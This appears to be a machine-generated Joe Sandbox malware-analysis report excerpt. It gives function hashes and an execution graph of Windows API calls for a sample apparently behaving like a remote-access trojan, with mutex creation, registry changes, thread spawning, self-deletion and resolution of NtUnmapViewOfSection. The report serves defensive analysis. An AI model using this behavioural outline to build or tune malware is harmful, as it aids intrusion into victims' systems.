                                      • Instruction ID: 35bea8db77733b5b4ca842b93877a9a43cb38aeac1512788b60438085112c2db
                                      • Opcode Fuzzy Hash: eed368506392f53a7b8c62eec8f204ceca0c033c9963439794c94b276c572fb0
                                      • Instruction Fuzzy Hash: 4D11D2B5C007498FDB10CF9AD444BDEFBF4EB88314F14842AD869A7250D375A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0098D3D8 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3316a24c29e1b3633460769233b16a2ad8cd69270b3e92365be8798df08eb10
                                      • Instruction ID: 06479e04b2dac656877bbd88c1d4c5647d2643b4bc1f827dec6b63a1d01a9044
                                      • Opcode Fuzzy Hash: c3316a24c29e1b3633460769233b16a2ad8cd69270b3e92365be8798df08eb10
                                      • Instruction Fuzzy Hash: B5212871504204DFDB04EF20D9C0B26BB65FB98324F20C569D8090B3E6C33AE856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0098D4C4 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f10e2184a55737fcd08b8ad639803cfe296ac11deade689fa0b0b2cc7c7e82cd
                                      • Instruction ID: 256b34ea1771bfac5565e7f0967f1134317790c1874dedc443a47c1df79539c4
                                      • Opcode Fuzzy Hash: f10e2184a55737fcd08b8ad639803cfe296ac11deade689fa0b0b2cc7c7e82cd
                                      • Instruction Fuzzy Hash: EE210A71505240DFDB15EF14D9C0F26BF65FB98318F24C56AE8090B39AC336D856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0099D01C Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7df6a5952a8e9539ce6a4c305c10089509ff684c97014e80cbc27f6c0ab78645
                                      • Instruction ID: 034a02427c2c0e6025d53d990319a6c210a09f935ab1b60f9b1d8b6243bba610
                                      • Opcode Fuzzy Hash: 7df6a5952a8e9539ce6a4c305c10089509ff684c97014e80cbc27f6c0ab78645
                                      • Instruction Fuzzy Hash: 9C21DE71604300DFDF14DF28D9C4B26BBA5EB88314F24C969E84A4B296C33AD856CA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0099D1D4 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0427153f80d7cf6d90333e49f6dc575d612d24de4d932c8ba763822695a1c478
                                      • Instruction ID: 6f455a4ff1129a5840afbbc59a4680007b927cb027ab79669a83dbff487a2dd8
                                      • Opcode Fuzzy Hash: 0427153f80d7cf6d90333e49f6dc575d612d24de4d932c8ba763822695a1c478
                                      • Instruction Fuzzy Hash: 8F212671504300EFEF05DF58D9C0B2ABBA5FB88314F20C96DE8594B292C33AD856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0099D006 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20e5cfd0217d9dce8b2a01500cda8e8d8e6c7707d715b6b57b250724c52f194f
                                      • Instruction ID: 76caa28c25711abe6ba92228c08048785c814e9a5ce8180a145f6cc4586ddb25
                                      • Opcode Fuzzy Hash: 20e5cfd0217d9dce8b2a01500cda8e8d8e6c7707d715b6b57b250724c52f194f
                                      • Instruction Fuzzy Hash: AC215E755093808FDB12CF24D9D4715BF71EB46314F28C5EAD8898F6A7C33A984ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0098D3D3 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: fdd88ef2ba16efe931b72de362c315d41d8bec6c75b6c4ea467c4218036d8990
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: BC11D376504240DFDB15DF10D5C4B16BF72FB94324F24C6A9D8490B7A6C33AE85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0098D4BF Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: de924574d59b5a46b04f35552abcca7ba8e079bf26ccef153ea9d78642d3dd76
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: 0011E676504280DFCB15DF10D5C4B16BF71FB94318F24C6AAE8490B75AC336D85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0099D1CF Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction ID: ee488b1d3cfebd79ae008c6e08a082682c6779490fc4c6033e7302c8ef80e147
                                      • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction Fuzzy Hash: 9D118B75504280DFDB15CF14D5C4B19BBA1FB84314F24C6A9D8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:1.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.4%
                                      Total number of Nodes:506
                                      Total number of Limit Nodes:9
                                      execution_graph 47196 434887 47197 434893 CallCatchBlock 47196->47197 47222 434596 47197->47222 47199 43489a 47201 4348c3 47199->47201 47517 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47199->47517 47208 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47201->47208 47518 444251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47201->47518 47203 4348dc 47205 4348e2 CallCatchBlock 47203->47205 47519 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47203->47519 47213 434962 47208->47213 47520 4433e7 35 API calls 5 library calls 47208->47520 47233 434b14 47213->47233 47217 43498e 47219 434997 47217->47219 47521 4433c2 28 API calls _abort 47217->47521 47522 43470d 13 API calls 2 library calls 47219->47522 47223 43459f 47222->47223 47523 434c52 IsProcessorFeaturePresent 47223->47523 47225 4345ab 47524 438f31 10 API calls 4 library calls 47225->47524 47227 4345b0 47232 4345b4 47227->47232 47525 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47227->47525 47229 4345bd 47230 4345cb 47229->47230 47526 438f5a 8 API calls 3 library calls 47229->47526 47230->47199 47232->47199 47527 436e90 47233->47527 47236 434968 47237 4441a2 47236->47237 47529 44f059 47237->47529 47239 4441ab 47240 434971 47239->47240 47533 446815 35 API calls 47239->47533 47242 40e9c5 47240->47242 47535 41cb50 LoadLibraryA GetProcAddress 47242->47535 47244 40e9e1 GetModuleFileNameW 47540 40f3c3 47244->47540 47246 40e9fd 47555 4020f6 47246->47555 47249 4020f6 28 API calls 47250 40ea1b 47249->47250 47561 41be1b 47250->47561 47254 40ea2d 47587 401e8d 47254->47587 47256 40ea36 47257 40ea93 47256->47257 47258 40ea49 47256->47258 47593 401e65 22 API calls 47257->47593 47617 40fbb3 116 API calls 47258->47617 47261 40ea5b 47618 401e65 22 API calls 47261->47618 47262 40eaa3 47594 401e65 22 API calls 47262->47594 47264 40ea67 47619 410f37 36 API calls __EH_prolog 47264->47619 47266 40eac2 47595 40531e 28 API calls 47266->47595 47269 40ead1 47596 406383 28 API calls 47269->47596 47270 40ea79 47620 40fb64 77 API calls 47270->47620 47273 40eadd 47597 401fe2 47273->47597 47274 40ea82 47621 40f3b0 70 API calls 47274->47621 47280 401fd8 11 API calls 47282 40eefb 47280->47282 47281 401fd8 11 API calls 47283 40eafb 47281->47283 47512 4432f6 GetModuleHandleW 47282->47512 47609 401e65 22 API calls 47283->47609 47285 40eb04 47610 401fc0 28 API calls 47285->47610 47287 40eb0f 47611 401e65 22 API calls 47287->47611 47289 40eb28 47612 401e65 22 API calls 47289->47612 47291 40eb43 47292 40ebae 47291->47292 47622 406c1e 28 API calls 47291->47622 47613 401e65 22 API calls 47292->47613 47295 40eb70 47296 401fe2 28 API calls 47295->47296 47297 40eb7c 47296->47297 47298 401fd8 11 API calls 47297->47298 47301 40eb85 47298->47301 47299 40ec02 47614 40d069 47299->47614 47300 40ebbb 47300->47299 47624 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47300->47624 47623 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47301->47623 47303 40ec08 47304 40ea8b 47303->47304 47626 41b2c3 33 API calls 47303->47626 47304->47280 47307 40eba4 47307->47292 47309 40f34f 47307->47309 47709 4139a9 30 API calls 47309->47709 47310 40ec23 47313 40ec76 47310->47313 47627 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47310->47627 47311 40ebe6 47311->47299 47625 4139a9 30 API calls 47311->47625 47632 401e65 22 API calls 47313->47632 47317 40ec7f 47325 40ec90 47317->47325 47326 40ec8b 47317->47326 47318 40ec3e 47320 40ec42 47318->47320 47321 40ec4c 47318->47321 47319 40f365 47710 412475 65 API calls ___scrt_get_show_window_mode 47319->47710 47628 407738 30 API calls 47320->47628 47630 401e65 22 API calls 47321->47630 47634 401e65 22 API calls 47325->47634 47633 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47326->47633 47327 40ec47 47629 407260 97 API calls 47327->47629 47332 40f37f 47712 413a23 RegOpenKeyExW RegDeleteValueW 47332->47712 47333 40ec99 47635 41bc5e 28 API calls 47333->47635 47335 40ec55 47335->47313 47338 40ec71 47335->47338 47337 40eca4 47636 401f13 28 API calls 47337->47636 47631 407260 97 API calls 47338->47631 47339 40f392 47713 401f09 11 API calls 47339->47713 47341 40ecaf 47637 401f09 11 API calls 47341->47637 47345 40f39c 47714 401f09 11 API calls 47345->47714 47346 40ecb8 47638 401e65 22 API calls 47346->47638 47349 40f3a5 47715 40dd42 27 API calls 47349->47715 47350 40ecc1 47639 401e65 22 API calls 47350->47639 47352 40f3aa 47716 414f2a 167 API calls _strftime 47352->47716 47356 40ecdb 47640 401e65 22 API calls 47356->47640 47358 40ecf5 47641 401e65 22 API calls 47358->47641 47360 40ed80 47363 40ef06 ___scrt_get_show_window_mode 47360->47363 47364 40ed8a 47360->47364 47361 40ed0e 47361->47360 47642 401e65 22 API calls 47361->47642 47659 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47363->47659 47365 40ed93 47364->47365 47369 40ee0f 47364->47369 47648 401e65 22 API calls 47365->47648 47367 40ed9c 47649 401e65 22 API calls 47367->47649 47394 40ee0a ___scrt_get_show_window_mode 47369->47394 47370 40ed23 _wcslen 47370->47360 47643 401e65 22 API calls 47370->47643 47371 40edae 47650 401e65 22 API calls 47371->47650 47373 40ed3e 47644 401e65 22 API calls 47373->47644 47376 40edc0 47651 401e65 22 API calls 47376->47651 47378 40ed53 47645 40da34 31 API calls 47378->47645 47379 40ef51 47660 401e65 22 API calls 47379->47660 47383 40ede9 47652 401e65 22 API calls 47383->47652 47384 40ef76 47661 402093 28 API calls 47384->47661 47385 40ed66 47646 401f13 28 API calls 47385->47646 47388 40ed72 47647 401f09 11 API calls 47388->47647 47390 40ef88 47662 41376f 14 API calls 47390->47662 47392 40edfa 47653 40cdf9 45 API calls _wcslen 47392->47653 47393 40ed7b 47393->47360 47394->47369 47654 413947 31 API calls 47394->47654 47398 40ef9e 47663 401e65 22 API calls 47398->47663 47399 40eea3 ctype 47655 401e65 22 API calls 47399->47655 47401 40efaa 47664 43baac 39 API calls _strftime 47401->47664 47404 40efb7 47406 40efe4 47404->47406 47665 41cd9b 86 API calls ___scrt_get_show_window_mode 47404->47665 47405 40eeba 47405->47379 47656 401e65 22 API calls 47405->47656 47666 402093 28 API calls 47406->47666 47408 40eed7 47657 41bc5e 28 API calls 47408->47657 47412 40efc8 CreateThread 47412->47406 47807 41d45d 10 API calls 47412->47807 47413 40eff9 47667 402093 28 API calls 47413->47667 47414 40eee3 47658 40f474 103 API calls 47414->47658 47417 40f008 47668 41b4ef 79 API calls 47417->47668 47418 40eee8 47418->47379 47420 40eeef 47418->47420 47420->47304 47421 40f00d 47669 401e65 22 API calls 47421->47669 47423 40f019 47670 401e65 22 API calls 47423->47670 47425 40f02b 47671 401e65 22 API calls 47425->47671 47427 40f04b 47672 43baac 39 API calls _strftime 47427->47672 47429 40f058 47673 401e65 22 API calls 47429->47673 47431 40f063 47674 401e65 22 API calls 47431->47674 47433 40f074 47675 401e65 22 API calls 47433->47675 47435 40f089 47676 401e65 22 API calls 47435->47676 47437 40f09a 47438 40f0a1 StrToIntA 47437->47438 47677 409de4 169 API calls _wcslen 47438->47677 47440 40f0b3 47678 401e65 22 API calls 47440->47678 47442 40f101 47687 401e65 22 API calls 47442->47687 47443 40f0bc 47443->47442 47679 4344ea 47443->47679 47448 40f0e4 47449 40f0eb CreateThread 47448->47449 47449->47442 47808 419fb4 102 API calls 2 library calls 47449->47808 47450 40f159 47689 401e65 22 API calls 47450->47689 47451 40f111 47451->47450 47453 4344ea new 22 API calls 47451->47453 47454 40f126 47453->47454 47688 401e65 22 API calls 47454->47688 47456 40f138 47459 40f13f CreateThread 47456->47459 47457 40f1cc 47695 401e65 22 API calls 47457->47695 47458 40f162 47458->47457 47690 401e65 22 API calls 47458->47690 47459->47450 47806 419fb4 102 API calls 2 library calls 47459->47806 47462 40f17e 47691 401e65 22 API calls 47462->47691 47463 40f1d5 47464 40f21a 47463->47464 47696 401e65 22 API calls 47463->47696 47700 41b60d 79 API calls 47464->47700 47468 40f193 47692 40d9e8 31 API calls 47468->47692 47469 40f223 47701 401f13 28 API calls 47469->47701 47470 40f1ea 47697 401e65 22 API calls 47470->47697 47473 40f22e 47702 401f09 11 API calls 47473->47702 47475 40f1a6 47693 401f13 28 API calls 47475->47693 47477 40f1ff 47698 43baac 39 API calls _strftime 47477->47698 47479 40f237 CreateThread 47482 40f264 47479->47482 47483 40f258 CreateThread 47479->47483 47809 40f7a7 120 API calls 47479->47809 47480 40f1b2 47694 401f09 11 API calls 47480->47694 47485 40f279 47482->47485 47486 40f26d CreateThread 47482->47486 47483->47482 47810 4120f7 137 API calls 47483->47810 47490 40f2cc 47485->47490 47703 402093 28 API calls 47485->47703 47486->47485 47811 4126db 38 API calls ___scrt_get_show_window_mode 47486->47811 47488 40f1bb CreateThread 47488->47457 47805 401be9 49 API calls _strftime 47488->47805 47489 40f20c 47699 40c162 7 API calls 47489->47699 47705 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47490->47705 47493 40f29c 47704 4052fd 28 API calls 47493->47704 47496 40f2e4 47496->47349 47706 41bc5e 28 API calls 47496->47706 47501 40f2fd 47707 41361b 31 API calls 47501->47707 47506 40f313 47708 401f09 11 API calls 47506->47708 47508 40f346 DeleteFileW 47509 40f34d 47508->47509 47510 40f31e 47508->47510 47711 41bc5e 28 API calls 47509->47711 47510->47508 47510->47509 47511 40f334 Sleep 47510->47511 47511->47510 47513 434984 47512->47513 47513->47217 47514 44341f 47513->47514 47813 44319c 47514->47813 47517->47199 47518->47203 47519->47208 47520->47213 47521->47219 47522->47205 47523->47225 47524->47227 47525->47229 47526->47232 47528 434b27 GetStartupInfoW 47527->47528 47528->47236 47530 44f06b 47529->47530 47531 44f062 47529->47531 47530->47239 47534 44ef58 48 API calls 5 library calls 47531->47534 47533->47239 47534->47530 47536 41cb8f LoadLibraryA GetProcAddress 47535->47536 47537 41cb7f GetModuleHandleA GetProcAddress 47535->47537 47538 41cbb8 44 API calls 47536->47538 47539 41cba8 LoadLibraryA GetProcAddress 47536->47539 47537->47536 47538->47244 47539->47538 47717 41b4a8 FindResourceA 47540->47717 47544 40f3ed ctype 47727 4020b7 47544->47727 47547 401fe2 28 API calls 47548 40f413 47547->47548 47549 401fd8 11 API calls 47548->47549 47550 40f41c 47549->47550 47551 43bd51 new 21 API calls 47550->47551 47552 40f42d ctype 47551->47552 47733 406dd8 47552->47733 47554 40f460 47554->47246 47556 40210c 47555->47556 47557 4023ce 11 API calls 47556->47557 47558 402126 47557->47558 47559 402569 28 API calls 47558->47559 47560 402134 47559->47560 47560->47249 47787 4020df 47561->47787 47563 41be2e 47566 41bea0 47563->47566 47574 401fe2 28 API calls 47563->47574 47578 401fd8 11 API calls 47563->47578 47582 41be9e 47563->47582 47791 4041a2 28 API calls 47563->47791 47792 41ce34 28 API calls 47563->47792 47564 401fd8 11 API calls 47565 41bed0 47564->47565 47567 401fd8 11 API calls 47565->47567 47793 4041a2 28 API calls 47566->47793 47570 41bed8 47567->47570 47572 401fd8 11 API calls 47570->47572 47571 41beac 47573 401fe2 28 API calls 47571->47573 47575 40ea24 47572->47575 47576 41beb5 47573->47576 47574->47563 47583 40fb17 47575->47583 47577 401fd8 11 API calls 47576->47577 47579 41bebd 47577->47579 47578->47563 47794 41ce34 28 API calls 47579->47794 47582->47564 47584 40fb23 47583->47584 47586 40fb2a 47583->47586 47795 402163 11 API calls 47584->47795 47586->47254 47588 402163 47587->47588 47592 40219f 47588->47592 47796 402730 11 API calls 47588->47796 47590 402184 47797 402712 11 API calls std::_Deallocate 47590->47797 47592->47256 47593->47262 47594->47266 47595->47269 47596->47273 47598 401ff1 47597->47598 47605 402039 47597->47605 47599 4023ce 11 API calls 47598->47599 47600 401ffa 47599->47600 47601 40203c 47600->47601 47603 402015 47600->47603 47799 40267a 11 API calls 47601->47799 47798 403098 28 API calls 47603->47798 47606 401fd8 47605->47606 47607 4023ce 11 API calls 47606->47607 47608 401fe1 47607->47608 47608->47281 47609->47285 47610->47287 47611->47289 47612->47291 47613->47300 47800 401fab 47614->47800 47616 40d073 CreateMutexA GetLastError 47616->47303 47617->47261 47618->47264 47619->47270 47620->47274 47622->47295 47623->47307 47624->47311 47625->47299 47626->47310 47627->47318 47628->47327 47629->47321 47630->47335 47631->47313 47632->47317 47633->47325 47634->47333 47635->47337 47636->47341 47637->47346 47638->47350 47639->47356 47640->47358 47641->47361 47642->47370 47643->47373 47644->47378 47645->47385 47646->47388 47647->47393 47648->47367 47649->47371 47650->47376 47651->47383 47652->47392 47653->47394 47654->47399 47655->47405 47656->47408 47657->47414 47658->47418 47659->47379 47660->47384 47661->47390 47662->47398 47663->47401 47664->47404 47665->47412 47666->47413 47667->47417 47668->47421 47669->47423 47670->47425 47671->47427 47672->47429 47673->47431 47674->47433 47675->47435 47676->47437 47677->47440 47678->47443 47682 4344ef 47679->47682 47680 43bd51 new 21 API calls 47680->47682 47681 40f0d1 47686 401e65 22 API calls 47681->47686 47682->47680 47682->47681 47801 442f80 7 API calls 2 library calls 47682->47801 47802 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47682->47802 47803 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47682->47803 47686->47448 47687->47451 47688->47456 47689->47458 47690->47462 47691->47468 47692->47475 47693->47480 47694->47488 47695->47463 47696->47470 47697->47477 47698->47489 47699->47464 47700->47469 47701->47473 47702->47479 47703->47493 47705->47496 47706->47501 47707->47506 47708->47510 47709->47319 47711->47332 47712->47339 47713->47345 47714->47349 47715->47352 47804 41ad17 104 API calls 47716->47804 47718 41b4c5 LoadResource LockResource SizeofResource 47717->47718 47719 40f3de 47717->47719 47718->47719 47720 43bd51 47719->47720 47725 446137 __Getctype 47720->47725 47721 446175 47737 4405dd 20 API calls __dosmaperr 47721->47737 47723 446160 RtlAllocateHeap 47724 446173 47723->47724 47723->47725 47724->47544 47725->47721 47725->47723 47736 442f80 7 API calls 2 library calls 47725->47736 47728 4020bf 47727->47728 47738 4023ce 47728->47738 47730 4020ca 47742 40250a 47730->47742 47732 4020d9 47732->47547 47734 4020b7 28 API calls 47733->47734 47735 406dec 47734->47735 47735->47554 47736->47725 47737->47724 47739 402428 47738->47739 47740 4023d8 47738->47740 47739->47730 47740->47739 47749 4027a7 11 API calls std::_Deallocate 47740->47749 47743 40251a 47742->47743 47744 402520 47743->47744 47745 402535 47743->47745 47750 402569 47744->47750 47760 4028e8 47745->47760 47748 402533 47748->47732 47749->47739 47771 402888 47750->47771 47752 40257d 47753 402592 47752->47753 47754 4025a7 47752->47754 47776 402a34 22 API calls 47753->47776 47755 4028e8 28 API calls 47754->47755 47759 4025a5 47755->47759 47757 40259b 47777 4029da 22 API calls 47757->47777 47759->47748 47761 4028f1 47760->47761 47762 402953 47761->47762 47763 4028fb 47761->47763 47785 4028a4 22 API calls 47762->47785 47766 402904 47763->47766 47768 402917 47763->47768 47779 402cae 47766->47779 47769 402915 47768->47769 47770 4023ce 11 API calls 47768->47770 47769->47748 47770->47769 47772 402890 47771->47772 47773 402898 47772->47773 47778 402ca3 22 API calls 47772->47778 47773->47752 47776->47757 47777->47759 47780 402cb8 __EH_prolog 47779->47780 47786 402e54 22 API calls 47780->47786 47782 4023ce 11 API calls 47784 402d92 47782->47784 47783 402d24 47783->47782 47784->47769 47786->47783 47788 4020e7 47787->47788 47789 4023ce 11 API calls 47788->47789 47790 4020f2 47789->47790 47790->47563 47791->47563 47792->47563 47793->47571 47794->47582 47795->47586 47796->47590 47797->47592 47798->47605 47799->47605 47801->47682 47812 4127ee 61 API calls 47810->47812 47814 4431a8 _abort 47813->47814 47815 4431c0 47814->47815 47816 4432f6 _abort GetModuleHandleW 47814->47816 47835 445888 EnterCriticalSection 47815->47835 47818 4431b4 47816->47818 47818->47815 47847 44333a GetModuleHandleExW 47818->47847 47819 443266 47836 4432a6 47819->47836 47823 44323d 47826 443255 47823->47826 47856 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47823->47856 47824 443283 47839 4432b5 47824->47839 47825 4432af 47858 457729 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47825->47858 47857 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47826->47857 47827 4431c8 47827->47819 47827->47823 47855 443f50 20 API calls _abort 47827->47855 47835->47827 47859 4458d0 LeaveCriticalSection 47836->47859 47838 44327f 47838->47824 47838->47825 47860 448cc9 47839->47860 47842 4432e3 47845 44333a _abort 8 API calls 47842->47845 47843 4432c3 GetPEB 47843->47842 47844 4432d3 GetCurrentProcess TerminateProcess 47843->47844 47844->47842 47846 4432eb ExitProcess 47845->47846 47848 443364 GetProcAddress 47847->47848 47849 443387 47847->47849 47850 443379 47848->47850 47851 443396 47849->47851 47852 44338d FreeLibrary 47849->47852 47850->47849 47853 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47851->47853 47852->47851 47854 4433a0 47853->47854 47854->47815 47855->47823 47856->47826 47857->47819 47859->47838 47861 448cee 47860->47861 47865 448ce4 47860->47865 47866 4484ca 47861->47866 47864 4432bf 47864->47842 47864->47843 47873 434fcb 47865->47873 47867 4484fa 47866->47867 47871 4484f6 47866->47871 47867->47865 47868 44851a 47868->47867 47870 448526 GetProcAddress 47868->47870 47872 448536 __crt_fast_encode_pointer 47870->47872 47871->47867 47871->47868 47880 448566 47871->47880 47872->47867 47874 434fd6 IsProcessorFeaturePresent 47873->47874 47875 434fd4 47873->47875 47877 435018 47874->47877 47875->47864 47887 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47877->47887 47879 4350fb 47879->47864 47881 448587 LoadLibraryExW 47880->47881 47882 44857c 47880->47882 47883 4485a4 GetLastError 47881->47883 47886 4485bc 47881->47886 47882->47871 47884 4485af LoadLibraryExW 47883->47884 47883->47886 47884->47886 47885 4485d3 FreeLibrary 47885->47882 47886->47882 47886->47885 47887->47879 47888 404e26 WaitForSingleObject 47889 404e40 SetEvent FindCloseChangeNotification 47888->47889 47890 404e57 closesocket 47888->47890 47891 404ed8 47889->47891 47892 404e64 47890->47892 47893 404e7a 47892->47893 47901 4050e4 83 API calls 47892->47901 47895 404e8c WaitForSingleObject 47893->47895 47896 404ece SetEvent CloseHandle 47893->47896 47902 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47895->47902 47896->47891 47898 404e9b SetEvent WaitForSingleObject 47903 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47898->47903 47900 404eb3 SetEvent CloseHandle CloseHandle 47900->47896 47901->47893 47902->47898 47903->47900 47904 40165e 47905 401666 47904->47905 47906 401669 47904->47906 47907 4016a8 47906->47907 47909 401696 47906->47909 47908 4344ea new 22 API calls 47907->47908 47910 40169c 47908->47910 47911 4344ea new 22 API calls 47909->47911 47911->47910

                                      Executed Functions

                                      Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
